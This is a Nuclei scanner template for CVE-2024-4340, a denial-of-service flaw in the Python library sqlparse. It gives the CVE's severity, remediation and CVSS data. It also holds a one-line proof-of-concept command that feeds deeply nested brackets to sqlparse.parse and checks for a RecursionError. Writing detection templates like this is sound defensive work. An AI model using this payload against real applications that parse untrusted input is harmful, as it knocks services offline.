mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-01-31 15:53:33 +08:00
36 lines
1.3 KiB
YAML
36 lines
1.3 KiB
YAML
id: CVE-2024-4340
|
|
|
|
info:
|
|
name: sqlparse - Denial of Service
|
|
author: KoYejune0302,cheoljun99,sim4110,gy741
|
|
severity: high
|
|
description: |
|
|
Passing a heavily nested list to sqlparse.parse() leads to a Denial of Service due to RecursionError.
|
|
impact: |
|
|
Attackers can cause denial of service by sending heavily nested lists to sqlparse.parse(), triggering RecursionError and making the application unresponsive.
|
|
remediation: |
|
|
Upgrade sqlparse to a version later than the affected releases that implements recursion depth limits.
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2024-4340
|
|
epss-score: 0.17039
|
|
epss-percentile: 0.9477
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-4340
|
|
tags: cve,cve2024,py,code,dos,python,sqlparse,vuln
|
|
|
|
self-contained: true
|
|
code:
|
|
- engine:
|
|
- sh
|
|
- bash
|
|
source: |
|
|
python -c "import sqlparse; sqlparse.parse('[' * 10000 + ']' * 10000)"
|
|
|
|
matchers:
|
|
- type: word
|
|
part: stderr
|
|
words:
|
|
- "RecursionError: maximum recursion depth exceeded"
|
|
# digest: 490a0046304402202bf7e3b814e1873943cb9b330516cb3ad6106d418a120f676380ed54f2e57e2202205575058f07762a30ba89de089381acd912cfc758e70d46c71ed4d4e5a17c7a14:922c64590222798bb761d5b6d8e72950 |